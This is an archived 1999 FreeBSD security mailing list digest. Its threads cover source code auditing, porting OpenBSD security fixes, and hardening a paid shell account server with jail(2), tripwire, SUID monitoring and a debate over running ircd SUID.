Eklund , freebsd-security@FreeBSD.ORG Subject: Re: auditors In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 31 May 1999, Bill Fumerola wrote: > My exact feelings. Perhaps its time for me to go walking through > {Open,Net}BSD's cvs tree and start hunting security fixes. Well, fixes can be submitted, but it's no use unless they are implemented. A large number of OpenBSD patches/fixes implement non-standard behaviour, which often appear to be frowned upon by committers. At minimum these should be considered if an option is given to revert to the historical behaviour. Nick -- Therefore those skilled at the unorthodox are as infinite as heaven and earth, inexhaustible as the great rivers. -- Sun Tzu, The Art of War To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 22:56: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id 9A4CB14E40 for ; Mon, 31 May 1999 22:55:55 -0700 (PDT) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 3.00 #1) id 10ohWV-000Aug-00; Tue, 01 Jun 1999 07:55:39 +0200 From: Sheldon Hearn To: wkt@cs.adfa.edu.au Cc: security@FreeBSD.ORG Subject: Re: Pkt loggers: the port In-reply-to: Your message of "Tue, 01 Jun 1999 14:12:48 +1000." <199906010412.OAA48498@henry.cs.adfa.edu.au> Date: Tue, 01 Jun 1999 07:55:39 +0200 Message-ID: <41953.928216539@axl.noc.iafrica.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 01 Jun 1999 14:12:48 +1000, Warren Toomey wrote: > # This archive contains: > # > # pktsuckers1_2/Makefile Hi Warren, Just because other people have put version numbers in port directory names, doesn't mean you should. It's an evil and much abused exception to the rule for situations where two (usually incompatible) branches of a package exist. For your package, it's not necessary. :-) Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 23:13:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id E75F8155F3 for ; Mon, 31 May 1999 23:13:35 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id IAA18871; Tue, 1 Jun 1999 08:12:33 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Unknow User Cc: Kris Kennaway , security@FreeBSD.ORG Subject: Re: Shell Account system In-reply-to: Your message of "Mon, 31 May 1999 23:16:04 -0300." <37534264.6D29110A@tdnet.com.br.> Date: Tue, 01 Jun 1999 08:12:32 +0200 Message-ID: <18869.928217552@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Look at the jail(2) facility in -current. It severely limits the bad things people can do, without limiting the good things. In message <37534264.6D29110A@tdnet.com.br.>, Unknow User writes: >Yeah, thanks, but the system is for anyone able to pay, so, you can say >i trust nobody. > >Kris Kennaway wrote: >> >> On Mon, 31 May 1999, Joe Gleason wrote: >> >> [Snip] >> >> Good advice, but running a shell account for people who you don't really trust >> is still not a wise move for the inexperienced, and not something you can >> easily document in a webpage. UNIX security is a way of life - there are any >> number of things which the unwary can trip over which could potentially >> compromise your machine. >> >> If it's for a small group of users who you trust fairly well, you >> probably should be okay, though. > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 0:57:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id E619115644; Tue, 1 Jun 1999 00:57:32 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id JAA20450; Tue, 1 Jun 1999 09:56:58 +0200 (CEST) (envelope-from des) To: Bill Fumerola Cc: Eivind Eklund , freebsd-security@FreeBSD.ORG Subject: Re: auditors References: From: Dag-Erling Smorgrav Date: 01 Jun 1999 09:56:57 +0200 In-Reply-To: Bill Fumerola's message of "Mon, 31 May 1999 15:27:34 -0400 (EDT)" Message-ID: Lines: 12 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Bill Fumerola writes: > I could help merge the userland fixes, however I am not the one to lead > this. > > Takers? I should think Bruce Evans would be the ideal person to lead such an effort. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 4:32: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from bagira.iit.bme.hu (bagira.iit.bme.hu [152.66.241.5]) by hub.freebsd.org (Postfix) with ESMTP id 2DCF115216 for ; Tue, 1 Jun 1999 04:31:06 -0700 (PDT) (envelope-from mohacsi@bagira.iit.bme.hu) Received: from localhost (mohacsi@localhost) by bagira.iit.bme.hu (8.9.1/8.9.1) with ESMTP id NAA07145; Tue, 1 Jun 1999 13:30:43 +0200 (MET DST) Date: Tue, 1 Jun 1999 13:30:43 +0200 (MET DST) From: Janos Mohacsi To: Dan Langille Cc: "Ilmar S. Habibulin" , freebsd-security@FreeBSD.ORG Subject: Re: auditors In-Reply-To: <19990531204003.LQOG7869945.mta1-rme@wocker> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 1 Jun 1999, Dan Langille wrote: > Date: Tue, 1 Jun 1999 08:37:28 +1200 > From: Dan Langille > To: Ilmar S. Habibulin > Cc: freebsd-security@FreeBSD.ORG > Subject: Re: auditors > > On 1 Jun 99, at 0:14, Ilmar S. Habibulin wrote: > > > On Mon, 31 May 1999, Snob Art Genre wrote: > > > > > > And what about posix auditing? Robert Watson made posix.1e audit > > > > implementation for freebsd. Why do not use his work? > > > > > > Different kind of auditing. The first is people vetting code for > > > security flaws, the second is logging of system events. > > Oh, i suppose i misunderstood term "auditing". You we talking about source > > code auditing? > > Yes. And a cute extract from the URL given > (http://www.FreeBSD.org/auditors.html): > > "Our second step will be this audit, an attempt to methodically go through > every line of source in FreeBSD looking for obvious buffer overflows > (sprintf()/strcpy() vs nprintf()/strncpy() and so on), less obvious > security holes, instances of insufficiently defensive coding, amusing > comment strings to forward to freebsd-chat, whatever we run > across." May be it is worth making some audits on sprintf/strcpy, but it is less useful for 3rd party programs like packages and ports. I would recommend to include libparanoia as standard also. Janos Mohacsi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 6:40:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sminter.com.ar (ns1.sminter.com.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 2E296156B9 for ; Tue, 1 Jun 1999 06:40:21 -0700 (PDT) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id KAA27697; Tue, 1 Jun 1999 10:25:40 -0300 (GMT) Message-Id: <199906011325.KAA27697@ns1.sminter.com.ar> Subject: Re: Shell Account system In-Reply-To: <18869.928217552@critter.freebsd.dk> from Poul-Henning Kamp at "Jun 1, 99 08:12:32 am" To: phk@critter.freebsd.dk (Poul-Henning Kamp) Date: Tue, 1 Jun 1999 10:25:40 -0300 (GMT) Cc: kernel@tdnet.com.br, kkennawa@physics.adelaide.edu.au, security@FreeBSD.ORG From: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org En un mensaje anterior, Poul-Henning Kamp escribió: > > Look at the jail(2) facility in -current. It severely limits the > bad things people can do, without limiting the good things. [...] Is this the chroot alternative you developed for somebody and where going to merge into the source tree some day? Regards. Fernando P. Schapachnik Administración de la red VIA Net Works Argentina SA Diagonal Roque Sáenz Peña 971, 4º y 5º piso. 1035 - Capital Federal, Argentina. (54-11) 4323-3333 http://www.via-net-works.net.ar To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 7:10:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (unknown [206.67.97.83]) by hub.freebsd.org (Postfix) with ESMTP id 68BAE14CA8; Tue, 1 Jun 1999 07:08:53 -0700 (PDT) (envelope-from billf@jade.chc-chimes.com) Received: from localhost (billf@localhost) by jade.chc-chimes.com (8.8.8/8.8.8) with SMTP id KAA19516; Tue, 1 Jun 1999 10:08:40 -0400 (EDT) (envelope-from billf@jade.chc-chimes.com) Date: Tue, 1 Jun 1999 10:08:40 -0400 (EDT) From: Bill Fumerola To: 0x1c Cc: Kris Kennaway , Eivind Eklund , freebsd-security@FreeBSD.ORG Subject: Re: auditors In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 1 Jun 1999, 0x1c wrote: > Well, fixes can be submitted, but it's no use unless they are implemented. > A large number of OpenBSD patches/fixes implement non-standard behaviour, > which often appear to be frowned upon by committers. At minimum these > should be considered if an option is given to revert to the historical > behaviour. Definatly. I'm just looking for fixes, not changes. - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 7:37: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 8520714ED1 for ; Tue, 1 Jun 1999 07:36:52 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id QAA20151; Tue, 1 Jun 1999 16:34:29 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Fernando Schapachnik Cc: kernel@tdnet.com.br, kkennawa@physics.adelaide.edu.au, security@FreeBSD.ORG Subject: Re: Shell Account system In-reply-to: Your message of "Tue, 01 Jun 1999 10:25:40 -0300." <199906011325.KAA27697@ns1.sminter.com.ar> Date: Tue, 01 Jun 1999 16:34:29 +0200 Message-ID: <20149.928247669@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org yes. In message <199906011325.KAA27697@ns1.sminter.com.ar>, Fernando Schapachnik wri tes: >En un mensaje anterior, Poul-Henning Kamp escribió: >> >> Look at the jail(2) facility in -current. It severely limits the >> bad things people can do, without limiting the good things. >[...] > >Is this the chroot alternative you developed for somebody and where going to >merge into the source tree some day? > >Regards. > > > >Fernando P. Schapachnik >Administración de la red >VIA Net Works Argentina SA >Diagonal Roque Sáenz Peña 971, 4º y 5º piso. >1035 - Capital Federal, Argentina. >(54-11) 4323-3333 >http://www.via-net-works.net.ar > -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 8: 0:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from main.websitebuilding.com (main.websitebuilding.com [209.98.117.130]) by hub.freebsd.org (Postfix) with SMTP id 9A8A915745 for ; Tue, 1 Jun 1999 08:00:45 -0700 (PDT) (envelope-from kingjedi@gzero.org) Received: (qmail 42081 invoked from network); 1 Jun 1999 14:53:48 -0000 Received: from gg-151-12.azalea.net (HELO Dasck) (206.52.151.12) by gzero.org with SMTP; 1 Jun 1999 14:53:48 -0000 Message-ID: <009d01beac3f$8633a040$0200a8c0@websitebuilding.com> From: "KingJedi" Cc: References: <20149.928247669@critter.freebsd.dk> Subject: Re: Shell Account system Date: Tue, 1 Jun 1999 10:00:41 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.100 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org So how would one go about using this? Does anyone have any shells that use this feature? ----- Original Message ----- From: Poul-Henning Kamp To: Fernando Schapachnik Cc: ; ; Sent: Tuesday, June 01, 1999 9:34 AM Subject: Re: Shell Account system > > yes. > > In message <199906011325.KAA27697@ns1.sminter.com.ar>, Fernando Schapachnik wri > tes: > >En un mensaje anterior, Poul-Henning Kamp escribió: > >> > >> Look at the jail(2) facility in -current. It severely limits the > >> bad things people can do, without limiting the good things. > >[...] > > > >Is this the chroot alternative you developed for somebody and where going to > >merge into the source tree some day? > > > >Regards. > > > > > > > >Fernando P. Schapachnik > >Administración de la red > >VIA Net Works Argentina SA > >Diagonal Roque Sáenz Peña 971, 4º y 5º piso. > >1035 - Capital Federal, Argentina. > >(54-11) 4323-3333 > >http://www.via-net-works.net.ar > > > > -- > Poul-Henning Kamp FreeBSD coreteam member > phk@FreeBSD.ORG "Real hackers run -current on their laptop." > FreeBSD -- It will take a long time before progress goes too far! > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 10:47:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from cain.tasam.com (cain.tasam.com [198.232.144.253]) by hub.freebsd.org (Postfix) with ESMTP id 6E53114F82 for ; Tue, 1 Jun 1999 10:47:11 -0700 (PDT) (envelope-from cain@tasam.com) Received: from localhost (localhost [127.0.0.1]) by cain.tasam.com (8.9.3/8.9.1) with SMTP id NAA11014 for ; Tue, 1 Jun 1999 13:42:22 -0400 (EDT) (envelope-from cain@tasam.com) Date: Tue, 1 Jun 1999 13:42:21 -0400 (EDT) From: Cain To: freebsd-security@freebsd.org Subject: Re: Shell Account system In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In addition to tripwire, monitor the existence of all SUID programs, when new ones appear make sure you know about it. BTW, ircd is usually SUID, so if a user of yours sets that up it's normal. But then how do you know a hacker just hasn't named his root shell ircd... so monitor the sizes of new SUID programs, oh yes, do not allow modules. Have everything compiled into the kernel that you need On Mon, 31 May 1999, Timothy R. Platt wrote: > Install tripwire, it's in the ports. > > Better install a traffic logger, or better yet ipfw. You'll need them to > log and report all the smurfs, fraggles, and synks you're going to get. > > Tim > > > > > >Yeah, thanks, but the system is for anyone able to pay, so, you can say > >i trust nobody. > > > >Kris Kennaway wrote: > >> > >> On Mon, 31 May 1999, Joe Gleason wrote: > >> > >> [Snip] > >> > >> Good advice, but running a shell account for people who you don't really > >>trust > >> is still not a wise move for the inexperienced, and not something you can > >> easily document in a webpage. UNIX security is a way of life - there are any > >> number of things which the unwary can trip over which could potentially > >> compromise your machine. > >> > >> If it's for a small group of users who you trust fairly well, you > >> probably should be okay, though. > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 18:28:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from zerlargal.humbug.org.au (zerlargal.humbug.org.au [203.143.240.7]) by hub.freebsd.org (Postfix) with ESMTP id C335714DBD for ; Tue, 1 Jun 1999 18:28:54 -0700 (PDT) (envelope-from bc@thehub.com.au) Received: from localhost ([127.0.0.1] helo=zerlargal.humbug.org.au) by zerlargal.humbug.org.au with smtp (Exim 2.05 #3) id 10ozos-0003B5-00; Wed, 2 Jun 1999 11:27:50 +1000 Date: Wed, 2 Jun 1999 11:27:49 +1000 (EST) From: Bruce Campbell X-Sender: bc@zerlargal.humbug.org.au To: Cain Cc: freebsd-security@FreeBSD.ORG Subject: Re: Shell Account system In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 1 Jun 1999, Cain wrote: > In addition to tripwire, monitor the existence of all SUID programs, when > new ones appear make sure you know about it. BTW, ircd is usually SUID, so > if a user of yours sets that up it's normal. But then how do you know a > hacker just hasn't named his root shell ircd... so monitor the sizes of > new SUID programs Possibly putting my foot in my mouth here, but *why* would ircd need to be SUID to anyone? It commonly runs at the high ports (6667) and thus does not need root for that. If you want a specific ircd user to run ircd (either by script or by respawning from init), I don't see a need for the ircd binary to be SUID to anyone (executable only be that user yes, SUID no) Or am I missing something here? --==-- Bruce. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 18:45: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.theinternet.com.au (zeus.theinternet.com.au [203.34.176.2]) by hub.freebsd.org (Postfix) with ESMTP id 7144B14DBD for ; Tue, 1 Jun 1999 18:44:50 -0700 (PDT) (envelope-from akm@mail.theinternet.com.au) Received: (from akm@localhost) by mail.theinternet.com.au (8.9.3/8.9.3) id LAA21482; Wed, 2 Jun 1999 11:47:27 +1000 (EST) (envelope-from akm) From: Andrew Kenneth Milton Message-Id: <199906020147.LAA21482@mail.theinternet.com.au> Subject: Re: Shell Account system In-Reply-To: from Bruce Campbell at "Jun 2, 1999 11:27:49 am" To: bc@thehub.com.au (Bruce Campbell) Date: Wed, 2 Jun 1999 11:47:27 +1000 (EST) Cc: cain@tasam.com, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org +----[ Bruce Campbell ]--------------------------------------------- | On Tue, 1 Jun 1999, Cain wrote: | | > In addition to tripwire, monitor the existence of all SUID programs, when | > new ones appear make sure you know about it. BTW, ircd is usually SUID, so | > if a user of yours sets that up it's normal. But then how do you know a | > hacker just hasn't named his root shell ircd... so monitor the sizes of | > new SUID programs | | Possibly putting my foot in my mouth here, but *why* would ircd need to be | SUID to anyone? It commonly runs at the high ports (6667) and thus does | not need root for that. | | If you want a specific ircd user to run ircd (either by script or by | respawning from init), I don't see a need for the ircd binary to be SUID | to anyone (executable only be that user yes, SUID no) | | Or am I missing something here? It's normally suid because the conf files are readable only by the 'owner' -- it's also suid to limit the damage you can do, normally you setup an 'irc' account and make it suid that. -- Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew The Internet (Aust) Pty Ltd | F:+61 7 3870 4477 | Milton ACN: 082 081 472 | M:+61 416 022 411 |72 Col .Sig PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au|Specialist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 19:19:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from Argon.Mlink.NET (Argon.Mlink.NET [205.236.182.18]) by hub.freebsd.org (Postfix) with ESMTP id E0BB81529C for ; Tue, 1 Jun 1999 19:19:29 -0700 (PDT) (envelope-from matt@Mlink.NET) Received: from aic-gw.mlink.net (matt@[209.104.118.65]) by Argon.Mlink.NET (8.8.8/8.8.2) with ESMTP id WAA09921; Tue, 1 Jun 1999 22:16:47 -0400 (EDT) Date: Tue, 1 Jun 1999 22:19:03 -0400 (EDT) From: matt To: Andrew Kenneth Milton Cc: Bruce Campbell , cain@tasam.com, freebsd-security@FreeBSD.ORG Subject: Re: Shell Account system In-Reply-To: <199906020147.LAA21482@mail.theinternet.com.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 2 Jun 1999, Andrew Kenneth Milton wrote: [...] : It's normally suid because the conf files are readable only by the : 'owner' -- it's also suid to limit the damage you can do, normally : you setup an 'irc' account and make it suid that. Actually, You normally would make an account called irc or ircd, chmod that home directory 700, set the D/S paths in the ircd config, and run it FROM the irc home dir, with the conf chmod 600. There's absolutely no need to SUID ircd at all, nor would I recommend it. Matt : -- : Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew : The Internet (Aust) Pty Ltd | F:+61 7 3870 4477 | Milton : ACN: 082 081 472 | M:+61 416 022 411 |72 Col .Sig : PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au|Specialist -- DISCLAIMER: Anyone sending me unsolicited commercial electronic mail will be charged a $100 fee for time spent reading it. Do NOT send this type of electronic mail to me. In reading this, you automatically agree to be subjected to these terms: US Code Title 47, Sec.227(a)(2)(B), a computer/modem/printer meets the definition of a telephone fax machine. By Sec.227(b)(1)(C), it is unlawful to send any unsolicited advertisement to such equipment. By Sec.227(b)(3)(C), a violation of the aforementioned Section is punishable by action to recover actual monetary loss, or $500, whichever is greater, for each violation. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 19:52:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.theinternet.com.au (zeus.theinternet.com.au [203.34.176.2]) by hub.freebsd.org (Postfix) with ESMTP id CCD5D14DE0 for ; Tue, 1 Jun 1999 19:52:37 -0700 (PDT) (envelope-from akm@mail.theinternet.com.au) Received: (from akm@localhost) by mail.theinternet.com.au (8.9.3/8.9.3) id MAA22390; Wed, 2 Jun 1999 12:54:39 +1000 (EST) (envelope-from akm) From: Andrew Kenneth Milton Message-Id: <199906020254.MAA22390@mail.theinternet.com.au> Subject: Re: Shell Account system In-Reply-To: from matt at "Jun 1, 1999 10:19: 3 pm" To: matt@Mlink.NET (matt) Date: Wed, 2 Jun 1999 12:54:39 +1000 (EST) Cc: akm@mail.theinternet.com.au, bc@thehub.com.au, cain@tasam.com, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org +----[ matt ]--------------------------------------------- | On Wed, 2 Jun 1999, Andrew Kenneth Milton wrote: | | [...] | | : It's normally suid because the conf files are readable only by the | : 'owner' -- it's also suid to limit the damage you can do, normally | : you setup an 'irc' account and make it suid that. | | Actually, You normally would make an account called irc or ircd, chmod | that home directory 700, set the D/S paths in the ircd config, and run | it FROM the irc home dir, with the conf chmod 600. There's absolutely | no need to SUID ircd at all, nor would I recommend it. Unless you have multiple remote admins, who you don't want to be able to stuff with the conf files, but, you do want them to be able to restart the daemon. -- Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew The Internet (Aust) Pty Ltd | F:+61 7 3870 4477 | Milton ACN: 082 081 472 | M:+61 416 022 411 |72 Col .Sig PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au|Specialist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 20: 9:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from pop3-3.enteract.com (pop3-3.enteract.com [207.229.143.32]) by hub.freebsd.org (Postfix) with SMTP id 2DF3A14DE0 for ; Tue, 1 Jun 1999 20:09:46 -0700 (PDT) (envelope-from dscheidt@enteract.com) Received: (qmail 59581 invoked from network); 2 Jun 1999 03:09:46 -0000 Received: from shell-1.enteract.com (dscheidt@207.229.143.40) by pop3-3.enteract.com with SMTP; 2 Jun 1999 03:09:46 -0000 Received: from localhost (dscheidt@localhost) by shell-1.enteract.com (8.9.3/8.9.2) with SMTP id WAA11875; Tue, 1 Jun 1999 22:09:41 -0500 (CDT) (envelope-from dscheidt@enteract.com) X-Authentication-Warning: shell-1.enteract.com: dscheidt owned process doing -bs Date: Tue, 1 Jun 1999 22:09:41 -0500 (CDT) From: David Scheidt To: Andrew Kenneth Milton Cc: matt , bc@thehub.com.au, cain@tasam.com, freebsd-security@FreeBSD.ORG Subject: Re: Shell Account system In-Reply-To: <199906020254.MAA22390@mail.theinternet.com.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 2 Jun 1999, Andrew Kenneth Milton wrote: > Unless you have multiple remote admins, who you don't want to be > able to stuff with the conf files, but, you do want them to be able > to restart the daemon. People you don't trust to change the conf files shouldn't be doing admin tasks. David scheidt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 20:14: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 8CCF414D6C for ; Tue, 1 Jun 1999 20:13:58 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id UAA86277; Tue, 1 Jun 1999 20:13:42 -0700 (PDT) (envelope-from dillon) Date: Tue, 1 Jun 1999 20:13:42 -0700 (PDT) From: Matthew Dillon Message-Id: <199906020313.UAA86277@apollo.backplane.com> To: Andrew Kenneth Milton Cc: matt@Mlink.NET (matt), akm@mail.theinternet.com.au, bc@thehub.com.au, cain@tasam.com, freebsd-security@FreeBSD.ORG Subject: Re: Shell Account system References: <199906020254.MAA22390@mail.theinternet.com.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :| :| Actually, You normally would make an account called irc or ircd, chmod :| that home directory 700, set the D/S paths in the ircd config, and run :| it FROM the irc home dir, with the conf chmod 600. There's absolutely :| no need to SUID ircd at all, nor would I recommend it. : :Unless you have multiple remote admins, who you don't want to be :able to stuff with the conf files, but, you do want them to be able :to restart the daemon. : :-- :Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew You can always argue that your favoriate methods of admin requires binaries to be suid-root, but all it means is that you need to change your methods. In this case, I think of several ways to avoid running ircd as root or with root and have admins who do not have root or access to the ircd account to nevertheless be able to restart the daemon. Perhaps with a special port/password, or simply with an suid-ircd program which kills and restarts ircd. No brainer. No root access required. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 20:14:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.theinternet.com.au (zeus.theinternet.com.au [203.34.176.2]) by hub.freebsd.org (Postfix) with ESMTP id 5AFA215244 for ; Tue, 1 Jun 1999 20:14:28 -0700 (PDT) (envelope-from akm@mail.theinternet.com.au) Received: (from akm@localhost) by mail.theinternet.com.au (8.9.3/8.9.3) id NAA22732; Wed, 2 Jun 1999 13:16:50 +1000 (EST) (envelope-from akm) From: Andrew Kenneth Milton Message-Id: <199906020316.NAA22732@mail.theinternet.com.au> Subject: Re: Shell Account system In-Reply-To: from David Scheidt at "Jun 1, 1999 10: 9:41 pm" To: dscheidt@enteract.com (David Scheidt) Date: Wed, 2 Jun 1999 13:16:50 +1000 (EST) Cc: akm@mail.theinternet.com.au, matt@Mlink.NET, bc@thehub.com.au, cain@tasam.com, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org +----[ David Scheidt ]--------------------------------------------- | On Wed, 2 Jun 1999, Andrew Kenneth Milton wrote: | | > Unless you have multiple remote admins, who you don't want to be | > able to stuff with the conf files, but, you do want them to be able | > to restart the daemon. | | People you don't trust to change the conf files shouldn't be doing admin | tasks. A sweeping generalisation certainly applicable to every situation conceivable to you. However, to other people the notion of levels of access is useful. You can do some things, but, you can't do everything. -- Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew The Internet (Aust) Pty Ltd | F:+61 7 3870 4477 | Milton ACN: 082 081 472 | M:+61 416 022 411 |72 Col .Sig PO Box 837 Indooroopilly 